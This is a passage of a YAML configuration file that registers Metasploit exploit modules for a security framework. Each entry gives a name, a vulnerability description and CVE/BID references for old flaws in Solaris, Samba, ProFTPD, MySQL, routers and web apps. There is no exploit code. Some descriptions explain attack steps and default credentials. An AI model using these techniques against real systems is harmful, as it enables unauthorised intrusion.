\t\t\t\tweakness with non-default server configuration, it is possible to exploit\n\
\t\t\t\tthis vulnerability successfully.\n\
\t\t\t"
authors:
- - CVE
- 1999-1053
- - OSVDB
- "84"
- - BID
- "776"
path: extensions/metasploit/
class: Msf_module
msf_awstats_configdir_exec:
enable: true
msf: true
msf_key: unix/webapp/awstats_configdir_exec
name: AWStats configdir Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\
\t\t\t\t\tAWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2\n\
\t\t\t\t\tare vulnerable.\n\
\t\t\t"
authors:
- - CVE
- 2005-0116
- - OSVDB
- "13002"
- - BID
- "12298"
- - URL
- http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities
path: extensions/metasploit/
class: Msf_module
msf_cacti_graphimage_exec:
enable: true
msf: true
msf_key: unix/webapp/cacti_graphimage_exec
name: Cacti graph_view.php Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\
\t\t\t\tRaxnet Cacti 'graph_view.php' script. All versions of Raxnet Cacti prior to\n\
\t\t\t\t0.8.6-d are vulnerable.\n\
\t\t\t"
authors:
- - OSVDB
- "17539"
- - BID
- "14042"
path: extensions/metasploit/
class: Msf_module
msf_php_xmlrpc_eval:
enable: true
msf: true
msf_key: unix/webapp/php_xmlrpc_eval
name: PHP XML-RPC Arbitrary Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary code execution flaw\n\
\t\t\t\tdiscovered in many implementations of the PHP XML-RPC module.\n\
\t\t\t\tThis flaw is exploitable through a number of PHP web\n\
\t\t\t\tapplications, including but not limited to Drupal, Wordpress,\n\
\t\t\t\tPostnuke, and TikiWiki.\n\
\t\t\t"
authors:
- - CVE
- 2005-1921
- - OSVDB
- "17793"
- - BID
- "14088"
path: extensions/metasploit/
class: Msf_module
msf_joomla_tinybrowser:
enable: true
msf: true
msf_key: unix/webapp/joomla_tinybrowser
name: Joomla 1.5.12 TinyBrowser File Upload Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the TinyMCE/tinybrowser plugin.\n\
\t\t\t\tThis plugin is not secured in version 1.5.12 of joomla and allows the upload\n\
\t\t\t\tof files on the remote server.\n\
\t\t\t\tBy renaming the uploaded file this vulnerability can be used to upload/execute\n\
\t\t\t\tcode on the affected system.\n\
\t\t\t"
authors:
- - OSVDB
- "64578"
- - URL
- http://milw0rm.com/exploits/9296
- - URL
- http://developer.joomla.org/security/news/301-20090722-core-file-upload.html
path: extensions/metasploit/
class: Msf_module
msf_mitel_awc_exec:
enable: true
msf: true
msf_key: unix/webapp/mitel_awc_exec
name: Mitel Audio and Web Conferencing Command Injection
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a command injection flaw within the Mitel\n\
\t\t\t\tAudio and Web Conferencing web interface.\n\
\t\t\t"
authors:
- - URL
- http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14
- - OSVDB
- "69934"
path: extensions/metasploit/
class: Msf_module
msf_openview_connectednodes_exec:
enable: true
msf: true
msf_key: unix/webapp/openview_connectednodes_exec
name: HP Openview connectedNodes.ovpl Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\
\t\t\t\tHP OpenView connectedNodes.ovpl CGI application. The results of the command\n\
\t\t\t\twill be displayed to the screen.\n\
\t\t\t"
authors:
- - CVE
- 2005-2773
- - OSVDB
- "19057"
- - BID
- "14662"
path: extensions/metasploit/
class: Msf_module
msf_barracuda_img_exec:
enable: true
msf: true
msf_key: unix/webapp/barracuda_img_exec
name: Barracuda IMG.PL Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\
\t\t\t\tBarracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable.\n\
\t\t\t"
authors:
- - CVE
- 2005-2847
- - OSVDB
- "19279"
- - BID
- "14712"
- - NSS
- "19556"
- - URL
- http://www.securiweb.net/wiki/Ressources/AvisDeSecurite/2005.1
path: extensions/metasploit/
class: Msf_module
msf_mambo_cache_lite:
enable: true
msf: true
msf_key: unix/webapp/mambo_cache_lite
name: Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a remote file inclusion vulnerability in\n\
\t\t\t\tincludes/Cache/Lite/Output.php in the Cache_Lite package in Mambo\n\
\t\t\t\t4.6.4 and earlier.\n\
\t\t\t"
authors:
- - CVE
- 2008-2905
- - OSVDB
- "46173"
- - BID
- "29716"
path: extensions/metasploit/
class: Msf_module
msf_pajax_remote_exec:
enable: true
msf: true
msf_key: unix/webapp/pajax_remote_exec
name: PAJAX Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tRedTeam has identified two security flaws in PAJAX (<= 0.5.1).\n\
\t\t\t\tIt is possible to execute arbitrary PHP code from unchecked user input.\n\
\t\t\t\tAdditionally, it is possible to include arbitrary files on the server\n\
\t\t\t\tending in \".class.php\".\n\
\t\t\t"
authors:
- - CVE
- 2006-1551
- - OSVDB
- "24618"
- - BID
- "17519"
- - URL
- http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.php
path: extensions/metasploit/
class: Msf_module
msf_base_qry_common:
enable: true
msf: true
msf_key: unix/webapp/base_qry_common
name: BASE base_qry_common Remote File Include
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a remote file inclusion vulnerability in\n\
\t\t\t\tthe base_qry_common.php file in BASE 1.2.4 and earlier.\n\
\t\t\t"
authors:
- - CVE
- 2006-2685
- - OSVDB
- "49366"
- - BID
- "18298"
path: extensions/metasploit/
class: Msf_module
msf_trixbox_langchoice:
enable: true
msf: true
msf_key: unix/webapp/trixbox_langchoice
name: Trixbox langChoice PHP Local File Inclusion
category: Metasploit
description: "\n\
\t\t\t\t\tThis module injects php into the trixbox session file and then, in a second call, evaluates\n\
\t\t\t\tthat code by manipulating the langChoice parameter as described in OSVDB-50421.\n\
\t\t\t"
authors: []
path: extensions/metasploit/
class: Msf_module
msf_redmine_scm_exec:
enable: true
msf: true
msf_key: unix/webapp/redmine_scm_exec
name: Redmine SCM Repository Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\
\t\t\t\tRedmine repository controller. The flaw is triggered when a rev parameter\n\
\t\t\t\tis passed to the command line of the SCM tool without adequate filtering.\n\
\t\t\t"
authors:
- - OSVDB
- "70090"
- - URL
- http://www.redmine.org/news/49
path: extensions/metasploit/
class: Msf_module
msf_heap_noir:
enable: true
msf: true
msf_key: solaris/dtspcd/heap_noir
name: Solaris dtspcd Heap Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is a port of noir's dtspcd exploit. This module should\n\
\t\t\t\twork against any vulnerable version of Solaris 8 (sparc).\n\
\t\t\t\tThe original exploit code was published in the book\n\
\t\t\t\tShellcoder's Handbook.\n\
\t\t\t"
authors:
- - CVE
- 2001-0803
- - OSVDB
- "4503"
- - BID
- "3517"
- - URL
- http://www.cert.org/advisories/CA-2001-31.html
- - URL
- http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip
path: extensions/metasploit/
class: Msf_module
msf_ttyprompt:
enable: true
msf: true
msf_key: solaris/telnet/ttyprompt
name: Solaris in.telnetd TTYPROMPT Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module uses a buffer overflow in the Solaris 'login'\n\
\t\t\tapplication to bypass authentication in the telnet daemon.\n\
\t\t\t"
authors:
- - CVE
- 2001-0797
- - OSVDB
- "690"
- - BID
- "5531"
path: extensions/metasploit/
class: Msf_module
msf_fuser:
enable: true
msf: true
msf_key: solaris/telnet/fuser
name: Sun Solaris Telnet Remote Authentication Bypass Vulnerability
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits the argument injection vulnerabilty\n\
\t\t\t\tin the telnet daemon (in.telnetd) of Solaris 10 and 11.\n\
\t\t\t"
authors:
- - CVE
- 2007-0882
- - OSVDB
- "31881"
- - BID
- "22512"
path: extensions/metasploit/
class: Msf_module
msf_trans2open:
enable: true
msf: true
msf_key: freebsd/samba/trans2open
name: Samba trans2open Overflow (*BSD x86)
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits the buffer overflow found in Samba versions\n\
\t\t\t\t2.2.0 to 2.2.8. This particular module is capable of\n\
\t\t\t\texploiting the flaw on x86 Linux systems that do not\n\
\t\t\t\thave the noexec stack option set.\n\
\t\t\t"
authors:
- - CVE
- 2003-0201
- - OSVDB
- "4469"
- - BID
- "7294"
- - URL
- http://seclists.org/bugtraq/2003/Apr/103
path: extensions/metasploit/
class: Msf_module
msf_lsa_transnames_heap:
enable: true
msf: true
msf_key: osx/samba/lsa_transnames_heap
name: Samba lsa_io_trans_names Heap Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module triggers a heap overflow in the LSA RPC service\n\
\t\t\tof the Samba daemon. This module uses the szone_free() to overwrite\n\
\t\t\tthe size() or free() pointer in initial_malloc_zones structure.\n\
\t\t\t"
authors:
- - CVE
- 2007-2446
- - OSVDB
- "34699"
path: extensions/metasploit/
class: Msf_module
msf_sadmind_adm_build_path:
enable: true
msf: true
msf_key: solaris/sunrpc/sadmind_adm_build_path
name: Sun Solaris sadmind adm_build_path() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow vulnerability in adm_build_path()\n\
\t\t\t\tfunction of sadmind daemon.\n\n\
\t\t\t\tThe distributed system administration daemon (sadmind) is the daemon used by\n\
\t\t\t\tSolstice AdminSuite applications to perform distributed system administration\n\
\t\t\t\toperations.\n\n\
\t\t\t\tThe sadmind daemon is started automatically by the inetd daemon whenever a\n\
\t\t\t\trequest to invoke an operation is received. The sadmind daemon process\n\
\t\t\t\tcontinues to run for 15 minutes after the last request is completed, unless a\n\
\t\t\t\tdifferent idle-time is specified with the -i command line option. The sadmind\n\
\t\t\t\tdaemon may be started independently from the command line, for example, at\n\
\t\t\t\tsystem boot time. In this case, the -i option has no effect; sadmind continues\n\
\t\t\t\tto run, even if there are no active requests.\n\
\t\t\t"
authors:
- - CVE
- 2008-4556
- - OSVDB
- "49111"
- - URL
- http://risesecurity.org/advisories/RISE-2008001.txt
path: extensions/metasploit/
class: Msf_module
msf_sadmind_exec:
enable: true
msf: true
msf_key: solaris/sunrpc/sadmind_exec
name: Solaris sadmind Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploit targets a weakness in the default security\n\
\t\t\t\tsettings of the sadmind RPC application. This server is\n\
\t\t\t\tinstalled and enabled by default on most versions of the\n\
\t\t\t\tSolaris operating system.\n\n\
\t\t\t\tVulnerable systems include solaris 2.7, 8, and 9\n\
\t\t\t"
authors:
- - CVE
- 2003-0722
- - OSVDB
- "4585"
- - BID
- "8615"
- - URL
- http://lists.insecure.org/lists/vulnwatch/2003/Jul-Sep/0115.html
path: extensions/metasploit/
class: Msf_module
msf_ypupdated_exec:
enable: true
msf: true
msf_key: solaris/sunrpc/ypupdated_exec
name: Solaris ypupdated Command Execution
category: Metasploit
description: "\n\
\t\t\t\tThis exploit targets a weakness in the way the ypupdated RPC\n\
\t\t\t\tapplication uses the command shell when handling a MAP UPDATE\n\
\t\t\t\trequest. Extra commands may be launched through this command\n\
\t\t\t\tshell, which runs as root on the remote host, by passing\n\
\t\t\t\tcommands in the format '|<command>'.\n\n\
\t\t\t\tVulnerable systems include Solaris 2.7, 8, 9, and 10, when\n\
\t\t\t\typupdated is started with the '-i' command-line option.\n\
\t\t\t"
authors:
- - CVE
- 1999-0209
- - OSVDB
- "11517"
- - BID
- "1749"
path: extensions/metasploit/
class: Msf_module
msf_sendmail_exec:
enable: true
msf: true
msf_key: solaris/lpd/sendmail_exec
name: Solaris LPD Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution flaw in\n\
\t\t\t\tthe in.lpd service shipped with all versions of Sun Solaris\n\
\t\t\t\tup to and including 8.0. This module uses a technique\n\
\t\t\t\tdiscovered by Dino Dai Zovi to exploit the flaw without\n\
\t\t\t\tneeding to know the resolved name of the attacking system.\n\
\t\t\t"
authors:
- - CVE
- 2001-1583
- - OSVDB
- "15131"
- - BID
- "3274"
path: extensions/metasploit/
class: Msf_module
msf_gld_postfix:
enable: true
msf: true
msf_key: linux/misc/gld_postfix
name: GLD (Greylisting Daemon) Postfix Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the Salim Gasmi\n\
\t\t\t\tGLD <= 1.4 greylisting daemon for Postfix. By sending an\n\
\t\t\t\toverly long string the stack can be overwritten.\n\
\t\t\t"
authors:
- - CVE
- 2005-1099
- - OSVDB
- "15492"
- - BID
- "13129"
- - URL
- http://www.milw0rm.com/exploits/934
path: extensions/metasploit/
class: Msf_module
msf_ib_inet_connect:
enable: true
msf: true
msf_key: linux/misc/ib_inet_connect
name: Borland InterBase INET_connect() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted service attach request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38605"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_netsupport_manager_agent:
enable: true
msf: true
msf_key: linux/misc/netsupport_manager_agent
name: NetSupport Manager Agent Remote Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in NetSupport Manager Agent. It\n\
\t\t\t\tuses a similar ROP to the proftpd_iac exploit in order to avoid non executable stack.\n\
\t\t\t"
authors:
- - CVE
- 2011-0404
- - OSVDB
- "70408"
- - BID
- "45728"
- - URL
- http://seclists.org/fulldisclosure/2011/Jan/90
- - URL
- http://www.exploit-db.com/exploits/15937/
path: extensions/metasploit/
class: Msf_module
msf_lprng_format_string:
enable: true
msf: true
msf_key: linux/misc/lprng_format_string
name: LPRng use_syslog Remote Format String Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a format string vulnerability in the LPRng print server.\n\
\t\t\t\tThis vulnerability was discovered by Chris Evans. There was a publicly\n\
\t\t\t\tcirculating worm targeting this vulnerability, which prompted RedHat to pull\n\
\t\t\t\ttheir 7.0 release. They consequently re-released it as \"7.0-respin\".\n\
\t\t\t"
authors:
- - CVE
- 2000-0917
- - OSVDB
- "421"
- - BID
- "1712"
- - US-CERT-VU
- "382365"
- - URL
- http://www.cert.org/advisories/CA-2000-22.html
- - URL
- https://bugzilla.redhat.com/show_bug.cgi?id=17756
- - URL
- http://www.exploit-db.com/exploits/226
- - URL
- http://www.exploit-db.com/exploits/227
- - URL
- http://www.exploit-db.com/exploits/230
path: extensions/metasploit/
class: Msf_module
msf_ib_open_marker_file:
enable: true
msf: true
msf_key: linux/misc/ib_open_marker_file
name: Borland InterBase open_marker_file() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted attach request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5244
- - OSVDB
- "38610"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_accellion_fta_mpipe2:
enable: true
msf: true
msf_key: linux/misc/accellion_fta_mpipe2
name: Accellion File Transfer Appliance MPIPE2 Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a chain of vulnerabilities in the Accellion \n\
\t\t\t\tFile Transfer appliance. This appliance exposes a UDP service on \n\
\t\t\t\tport 8812 that acts as a gateway to the internal communication bus. \n\
\t\t\t\tThis service uses Blowfish encryption for authentication, but the \n\
\t\t\t\tappliance ships with two easy to guess default authentication keys. \n\
\t\t\t\tThis module abuses the known default encryption keys to inject a \n\
\t\t\t\tmessage into the communication bus. In order to execute arbitrary \n\
\t\t\t\tcommands on the remote appliance, a message is injected into the bus \n\
\t\t\t\tdestined for the 'matchrep' service. This service exposes a function \n\
\t\t\t\tnamed 'insert_plugin_meta_info' which is vulnerable to an input \n\
\t\t\t\tvalidation flaw in a call to system(). This provides access to the \n\
\t\t\t\t'soggycat' user account, which has sudo privileges to run the \n\
\t\t\t\tprimary admin tool as root. These two flaws are fixed in update\n\
\t\t\t\tversion FTA_8_0_562.\t\n\
\t\t\t"
authors:
- - OSVDB
- "71362"
- - OSVDB
- "71363"
- - URL
- http://www.rapid7.com/security-center/advisories/R7-0039.jsp
path: extensions/metasploit/
class: Msf_module
msf_ib_pwd_db_aliased:
enable: true
msf: true
msf_key: linux/misc/ib_pwd_db_aliased
name: Borland InterBase PWD_db_aliased() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted attach request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38607"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_drb_remote_codeexec:
enable: true
msf: true
msf_key: linux/misc/drb_remote_codeexec
name: Distributed Ruby Send instance_eval/syscall Code Execution
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits remote code execution vulnerabilities in dRuby\n\
\t\t\t"
authors: []
path: extensions/metasploit/
class: Msf_module
msf_ib_jrd8_create_database:
enable: true
msf: true
msf_key: linux/misc/ib_jrd8_create_database
name: Borland InterBase jrd8_create_database() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted create request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38606"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_hplip_hpssd_exec:
enable: true
msf: true
msf_key: linux/misc/hplip_hpssd_exec
name: hplip hpssd.py From Address Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a command execution vulnerable in the hpssd.py\n\
\t\t\t\tdaemon of the Hewlett-Packard Linux Imaging and Printing Project.\n\
\t\t\t\tAccording to MITRE, versions 1.x and 2.x before 2.7.10 are vulnerable.\n\n\
\t\t\t\tThis module was written and tested using the Fedora 6 Linux distribution.\n\
\t\t\t\tOn the test system, the daemon listens on localhost only and runs with\n\
\t\t\t\troot privileges. Although the configuration shows the daemon is to\n\
\t\t\t\tlisten on port 2207, it actually listens on a dynamic port.\n\n\
\t\t\t\tNOTE: If the target system does not have a 'sendmail' command installed,\n\
\t\t\t\tthis vulnerability cannot be exploited.\n\
\t\t\t"
authors:
- - CVE
- 2007-5208
- - OSVDB
- "41693"
- - BID
- "26054"
- - URL
- https://bugzilla.redhat.com/show_bug.cgi?id=319921
- - URL
- https://bugzilla.redhat.com/attachment.cgi?id=217201&action=edit
path: extensions/metasploit/
class: Msf_module
msf_mysql_yassl_getname:
enable: true
msf: true
msf_key: linux/mysql/mysql_yassl_getname
name: MySQL yaSSL CertDecoder::GetName Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier)\n\
\t\t\t\timplementation bundled with MySQL. By sending a specially crafted\n\
\t\t\t\tclient certificate, an attacker can execute arbitrary code.\n\n\
\t\t\t\tThis vulnerability is present within the CertDecoder::GetName function inside\n\
\t\t\t\t\"taocrypt/src/asn.cpp\". However, the stack buffer that is written to exists\n\
\t\t\t\twithin a parent function's stack frame.\n\n\
\t\t\t\tNOTE: This vulnerability requires a non-default configuration. First, the attacker\n\
\t\t\t\tmust be able to pass the host-based authentication. Next, the server must be\n\
\t\t\t\tconfigured to listen on an accessible network interface. Lastly, the server\n\
\t\t\t\tmust have been manually configured to use SSL.\n\n\
\t\t\t\tThe binary from version 5.5.0-m2 was built with /GS and /SafeSEH. During testing\n\
\t\t\t\ton Windows XP SP3, these protections successfully prevented exploitation.\n\n\
\t\t\t\tTesting was also done with mysql on Ubuntu 9.04. Although the vulnerable code is\n\
\t\t\t\tpresent, both version 5.5.0-m2 built from source and version 5.0.75 from a binary\n\
\t\t\t\tpackage were not exploitable due to the use of the compiler's FORTIFY feature.\n\n\
\t\t\t\tAlthough suse11 was mentioned in the original blog post, the binary package they\n\
\t\t\t\tprovide does not contain yaSSL or support SSL.\n\
\t\t\t"
authors:
- - CVE
- 2009-4484
- - BID
- "37640"
- - BID
- "37943"
- - BID
- "37974"
- - OSVDB
- "61956"
- - URL
- http://secunia.com/advisories/38344/
- - URL
- http://intevydis.blogspot.com/2010/01/mysq-yassl-stack-overflow.html
path: extensions/metasploit/
class: Msf_module
msf_mysql_yassl_hello:
enable: true
msf: true
msf_key: windows/mysql/mysql_yassl_hello
name: MySQL yaSSL SSL Hello Message Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier)\n\
\t\t\t\timplementation bundled with MySQL <= 6.0. By sending a specially crafted\n\
\t\t\t\tHello packet, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-0226
- - OSVDB
- "41195"
- - BID
- "27140"
path: extensions/metasploit/
class: Msf_module
msf_proftp_telnet_iac:
enable: true
msf: true
msf_key: freebsd/ftp/proftp_telnet_iac
name: ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in versions of ProFTPD\n\
\t\t\t\tserver between versions 1.3.2rc3 and 1.3.3b. By sending data containing a\n\
\t\t\t\tlarge number of Telnet IAC commands, an attacker can corrupt memory and\n\
\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-4221
- - OSVDB
- "68985"
- - BID
- "44562"
path: extensions/metasploit/
class: Msf_module
msf_proftp_sreplace:
enable: true
msf: true
msf_key: linux/ftp/proftp_sreplace
name: ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in versions 1.2 through\n\
\t\t\t\t1.3.0 of ProFTPD server. The vulnerability is within the \"sreplace\" function\n\
\t\t\t\twithin the \"src/support.c\" file.\n\n\
\t\t\t\tThe off-by-one heap overflow bug in the ProFTPD sreplace function has been\n\
\t\t\t\tdiscovered about 2 (two) years ago by Evgeny Legerov. We tried to exploit\n\
\t\t\t\tthis off-by-one bug via MKD command, but failed. We did not work on this bug\n\
\t\t\t\tsince then.\n\n\
\t\t\t\tActually, there are exists at least two bugs in sreplace function, one is the\n\
\t\t\t\tmentioned off-by-one heap overflow bug the other is a stack-based buffer overflow\n\
\t\t\t\tvia 'sstrncpy(dst,src,negative argument)'.\n\n\
\t\t\t\tWe were unable to reach the \"sreplace\" stack bug on ProFTPD 1.2.10 stable\n\
\t\t\t\tversion, but the version 1.3.0rc3 introduced some interesting changes, among them:\n\n\
\t\t\t\t1. another (integer) overflow in sreplace!\n\
\t\t\t\t2. now it is possible to reach sreplace stack-based buffer overflow bug via\n\
\t\t\t\t\tthe \"pr_display_file\" function!\n\
\t\t\t\t3. stupid '.message' file display bug\n\n\
\t\t\t\tSo we decided to choose ProFTPD 1.3.0 as a target for our exploit.\n\
\t\t\t\tTo reach the bug, you need to upload a specially created .message file to a\n\
\t\t\t\twriteable directory, then do \"CWD <writeable directory>\" to trigger the invocation\n\
\t\t\t\tof sreplace function.\n\n\
\t\t\t\tNote that ProFTPD 1.3.0rc3 has introduced a stupid bug: to display '.message'\n\
\t\t\t\tfile you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug.\n\n\
\t\t\t\tThe exploit is a part of VulnDisco Pack since Dec 2005.\n\
\t\t\t"
authors:
- - CVE
- 2006-5815
- - OSVDB
- "68985"
- - BID
- "20992"
- - URL
- http://seclists.org/bugtraq/2006/Nov/94
- - URL
- http://seclists.org/bugtraq/2006/Nov/538
- - URL
- http://bugs.proftpd.org/show_bug.cgi?id=2858
- - URL
- http://proftp.cvs.sourceforge.net/proftp/proftpd/src/main.c?view=diff&r1=text&tr1=1.292&r2=text&tr2=1.294&diff_format=h
path: extensions/metasploit/
class: Msf_module
msf_imap_uw_lsub:
enable: true
msf: true
msf_key: linux/imap/imap_uw_lsub
name: UoW IMAP server LSUB Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the 'LSUB'\n\
\t\t\t\tcommand of the University of Washington IMAP service.\n\
\t\t\t\tThis vulnerability can only be exploited with a valid username\n\
\t\t\t\tand password.\n\
\t\t\t"
authors:
- - CVE
- 2000-0284
- - OSVDB
- "12037"
- - BID
- "1110"
- - URL
- http://www.milw0rm.com/exploits/284
path: extensions/metasploit/
class: Msf_module
msf_squid_ntlm_authenticate:
enable: true
msf: true
msf_key: linux/proxy/squid_ntlm_authenticate
name: Squid NTLM Authenticate Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for Squid\\'s NTLM authenticate overflow\n\
\t\t\t\t(libntlmssp.c). Due to improper bounds checking in\n\
\t\t\t\tntlm_check_auth, it is possible to overflow the 'pass'\n\
\t\t\t\tvariable on the stack with user controlled data of a user\n\
\t\t\t\tdefined length. Props to iDEFENSE for the advisory.\n\
\t\t\t"
authors:
- - CVE
- 2004-0541
- - OSVDB
- "6791"
- - URL
- http://www.idefense.com/application/poi/display?id=107
- - BID
- "10500"
path: extensions/metasploit/
class: Msf_module
msf_alcatel_omnipcx_mastercgi_exec:
enable: true
msf: true
msf_key: linux/http/alcatel_omnipcx_mastercgi_exec
name: Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module abuses a metacharacter injection vulnerability in the\n\
\t\t\t\tHTTP management interface of the Alcatel-Lucent OmniPCX Enterprise\n\
\t\t\t\tCommunication Server 7.1 and earlier. The Unified Maintenance Tool\n\
\t\t\t\tcontains a 'masterCGI' binary which allows an unauthenticated attacker\n\
\t\t\t\tto execute arbitrary commands by specifing shell metacharaters as the\n\
\t\t\t\t'user' within the 'ping' action to obtain 'httpd' user access. This\n\
\t\t\t\tmodule only supports command line payloads, as the httpd process kills\n\
\t\t\t\tthe reverse/bind shell spawn after the HTTP 200 OK response.\n\
\t\t\t"
authors:
- - OSVDB
- "40521"
- - BID
- "25694"
- - CVE
- 2007-3010
- - URL
- http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm
path: extensions/metasploit/
class: Msf_module
msf_piranha_passwd_exec:
enable: true
msf: true
msf_key: linux/http/piranha_passwd_exec
name: RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\tThis module abuses two flaws - a metacharacter injection vulnerability in the\n\
\t\t\t\tHTTP management server of RedHat 6.2 systems running the Piranha\n\
\t\t\t\tLVS cluster service and GUI (rpm packages: piranha and piranha-gui).\n\
\t\t\t\tThe vulnerability allows an authenticated attacker to execute arbitrary\n\
\t\t\t\tcommands as the Apache user account (nobody) within the\n\
\t\t\t\t/piranha/secure/passwd.php3 script. The package installs with a default\n\
\t\t\t\tuser and password of piranha:q which was exploited in the wild.\n\
\t\t\t"
authors:
- - CVE
- 2000-0248
- - OSVDB
- "289"
- - BID
- "1148"
- - CVE
- 2000-0322
- - OSVDB
- "1300"
- - BID
- "1149"
path: extensions/metasploit/
class: Msf_module
msf_linksys_apply_cgi:
enable: true
msf: true
msf_key: linux/http/linksys_apply_cgi
name: Linksys WRT54 Access Point apply.cgi Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers.\n\
\t\t\t\tAccording to iDefense who discovered this vulnerability, all WRT54G versions prior to\n\
\t\t\t\t4.20.7 and all WRT54GS version prior to 1.05.2 may be be affected.\n\
\t\t\t"
authors:
- - CVE
- 2005-2799
- - OSVDB
- "19389"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305
path: extensions/metasploit/
class: Msf_module
msf_ddwrt_cgibin_exec:
enable: true
msf: true
msf_key: linux/http/ddwrt_cgibin_exec
name: DD-WRT HTTP Daemon Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module abuses a metacharacter injection vulnerability in the\n\
\t\t\t\tHTTP management server of wireless gateways running DD-WRT. This flaw\n\
\t\t\t\tallows an unauthenticated attacker to execute arbitrary commands as\n\
\t\t\t\tthe root user account.\n\
\t\t\t"
authors:
- - CVE
- 2009-2765
- - OSVDB
- "55990"
- - BID
- "35742"
- - URL
- http://www.milw0rm.com/exploits/9209
path: extensions/metasploit/
class: Msf_module
msf_gpsd_format_string:
enable: true
msf: true
msf_key: linux/http/gpsd_format_string
name: Berlios GPSD Format String Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a format string vulnerability in the Berlios GPSD server.\n\
\t\t\t\tThis vulnerability was discovered by Kevin Finisterre.\n\
\t\t\t"
authors:
- - CVE
- 2004-1388
- - OSVDB
- "13199"
- - BID
- "12371"
- - URL
- http://www.securiteam.com/unixfocus/5LP0M1PEKK.html
path: extensions/metasploit/
class: Msf_module
msf_peercast_url:
enable: true
msf: true
msf_key: windows/http/peercast_url
name: PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)
category: Metasploit
